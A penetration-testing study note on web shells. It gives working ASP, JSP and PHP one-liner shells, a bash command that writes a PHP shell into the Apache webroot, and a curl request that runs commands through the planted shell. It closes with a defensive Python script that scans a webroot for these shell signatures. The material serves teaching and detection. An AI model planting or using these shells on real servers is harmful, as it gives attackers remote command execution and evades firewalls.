
Web shells

All about shells
| Shell Type | Description |
| --- | --- |
| Reverse shell | Initiates a connection back to a "listener" on our attack box. |
| Bind shell | "Binds" to a specific port on the target host and waits for a connection from our attack box. |
| Web shell | Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (for example, leveraging a file upload vulnerability and uploading a PHP script to run a single command). |

Preconfigured webshells in Kali Linux

Go to /usr/share/webshells/

Other resources

See reverse shells

A Web Shell is typically a web script that accepts our command through HTTP request parameters, executes our command, and prints its output back on the web page.

A web shell script is typically a one-liner that is very short and can be memorized easily.

Some basic web shells

asp

<% eval request("cmd") %>

jsp

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

php

<?php system($_REQUEST["cmd"]); ?>

How to exploit a web shell

File upload vs Remote code execution

1. FILE UPLOAD: By abusing an upload feature. We would place this web shell script into the remote host's web directory to execute the script through the web browser.

2. REMOTE CODE EXECUTION: By writing our one-liner shell to the webroot to access it over the web. This applies when we only have remote command execution as an exploit vector. Here is an example for bash:

echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php

So, for the second way of exploitation, it's relevant to identify where the webroot is. The following are the default webroots for common web servers:

| Web Server | Default Webroot |
| --- | --- |
| Apache | /var/www/html/ |
| Nginx | /usr/local/nginx/html/ |
| IIS | c:\inetpub\wwwroot\ |
| XAMPP | C:\xampp\htdocs\ |

Accessing the web shell

We can access the web shell using the browser or curl:

curl "http://SERVER_IP:PORT/shell.php?cmd=id"

A benefit of a web shell is that it would bypass any firewall restriction in place, as it does not open a new connection on a separate port but runs over the web port (80, 443, or whatever port the web application is using).
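From the defender's side, the basic web shells listed above all pass a request parameter straight into an execution primitive, and that shape can be searched for in files under the webroot. The sweep below is an added example, not part of the original notes; the names scan_webroot, SIGNATURES and MAX_BYTES, the 1 MiB cutoff and the sample files are assumptions constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Request input passed straight to an execution primitive, modelled on the
# ASP, JSP and PHP one-liners listed on this page. Baseline signatures only.
SIGNATURES = {
    "php-exec-of-request": re.compile(
        rb"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
        rb"\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\b", re.I),
    "asp-eval-of-request": re.compile(
        rb"\b(?:eval|execute)\b\s*\(?\s*request\s*[(.]", re.I),
    "jsp-exec-of-parameter": re.compile(
        rb"\.exec\s*\(\s*request\s*\.\s*getParameter\s*\(", re.I),
}
MAX_BYTES = 1024 * 1024  # assumed cutoff: skip files larger than 1 MiB


def scan_webroot(root):
    """Return sorted (relative path, line number, signature name) findings."""
    findings, root = [], Path(root)
    for path in root.rglob("*"):
        try:
            if not path.is_file() or path.stat().st_size > MAX_BYTES:
                continue
            data = path.read_bytes()
        except OSError:
            continue  # unreadable entry: skip it rather than abort the sweep
        for name, pattern in SIGNATURES.items():
            for match in pattern.finditer(data):
                line = data.count(b"\n", 0, match.start()) + 1
                findings.append((path.relative_to(root).as_posix(), line, name))
    return sorted(findings)


def demo():
    """Scan a constructed webroot: one benign page and two planted samples."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "uploads").mkdir()
        (root / "index.php").write_text('<?php echo "hello"; ?>\n')
        (root / "uploads" / "avatar.php").write_text(
            '<?php\n// constructed sample\nsystem($_REQUEST["cmd"]); ?>\n')
        (root / "uploads" / "logo.gif.jsp").write_text(
            '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>\n')
        return scan_webroot(root)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Signature matching like this only catches unobfuscated shells, so treat a clean result as a baseline and pair the sweep with file-integrity monitoring on the webroot and review of the web server's access logs.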

Tools

About webshells.

Laudanum

nishang

Last update: 2024-10-20
Created: May 23, 2023 15:01:08